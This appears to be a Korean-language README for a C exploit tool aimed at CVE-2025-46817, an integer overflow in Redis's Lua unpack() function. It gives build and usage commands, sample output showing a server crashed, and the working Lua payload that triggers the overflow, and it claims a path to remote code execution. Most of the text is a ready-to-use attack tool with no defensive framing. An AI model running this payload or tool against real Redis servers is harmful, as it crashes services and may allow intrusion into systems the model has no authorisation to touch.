
C 기반 CVE-2025-46817 익스플로잇으로, Redis 정수 오버플로우 취약점을 이용하여 크래시 탐지를 가능하게 하고 Lua unpack() 페이로드를 통한 잠재적 RCE를 지원합니다.
Redis 정수 오버플로우 취약점에 대한 CVE-2025-46817 익스플로잇의 경량 C 구현입니다.
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev
sudo yum install gcc hiredis-devel
brew install hiredis
gcc -o exploit exploit.c -lhiredis
./exploit -H 127.0.0.1 -P 6379
./exploit -H 192.168.1.100 -P 6379 -t 5
-H <host> Redis 서버 호스트 (필수)
-P <port> Redis 서버 포트 (필수)
-t <timeout> 연결 타임아웃(초) (기본값: 10)
-h 도움말 메시지 표시
██▓███ █ █░███▄ █ ▄▄▄▄ █ ██ █████▒ █████▒▓█████ ██▀███
▓██░ ██▒▓█░ █ ░█░██ ▀█ █ ▓█████▄ ██ ▓██▒▓██ ▒▓██ ▒ ▓█ ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██ ▀█ ██▒▒██▒ ▄██▓██ ▒██░▒████ ░▒████ ░ ▒███ ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒ ▐▌██▒▒██░█▀ ▓▓█ ░██░░▓█▒ ░░▓█▒ ░ ▒▓█ ▄ ▒██▀▀█▄
▒██▒ ░ ░░░██▒██▓▒██░ ▓██░░▓█ ▀█▓▒▒█████▓ ░▒█░ ░▒█░ ░▒████▒░██▓ ▒██▒
▒▓▒░ ░ ░░ ▓░▒ ▒ ░ ▒░ ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒ ▒ ░ ▒ ░ ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░ ▒ ░ ░ ░ ░░ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░ ░ ░ ░ ░ ░▒ ░ ▒░
░░ ░ ░ ░ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░
░
CVE-2025-46817 익스플로잇 도구
정수 오버플로우 -> RCE 체인
접속 -> https://pwnbuffer.org/
작성자: Slayerkkk
대상: Redis <= 8.2.1
유형: 메모리 손상 -> 코드 실행
ℹ️ 127.0.0.1:6379에 연결 테스트 중...
✅ 연결 성공
ℹ️ Redis 버전: 8.2.1
❌ 취약함 - 버전 <= 8.2.1
ℹ️ Lua 스크립팅 테스트 중...
✅ Lua 활성화됨 (1+1=2)
🚀 익스플로잇 시작
==================================================
💀 익스플로잇 페이로드 실행 중...
페이로드: unpack()를 통한 정수 오버플로우
💥 서버 크래시 - 연결 끊김!
📊 익스플로잇 결과
==============================
💥 상태: 크래시됨 (2.34초)
💀 익스플로잇 성공 - 서버 크래시!
CVE-2025-46817 취약점 확인됨
이 익스플로잇은 Redis의 Lua unpack() 함수 구현(luaB_unpack)에서 발생하는 정수 오버플로우를 대상으로 합니다. 특정 매개변수로 호출하면 부호 있는 정수 연산이 오버플로우되어 Redis가 엄청난 수의 반환 값을 구체화하려고 시도합니다.
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}
이 도구는 다음 상태 중 하나를 보고합니다:
작성자: Slayerkkk
웹사이트: https://pwnbuffer.org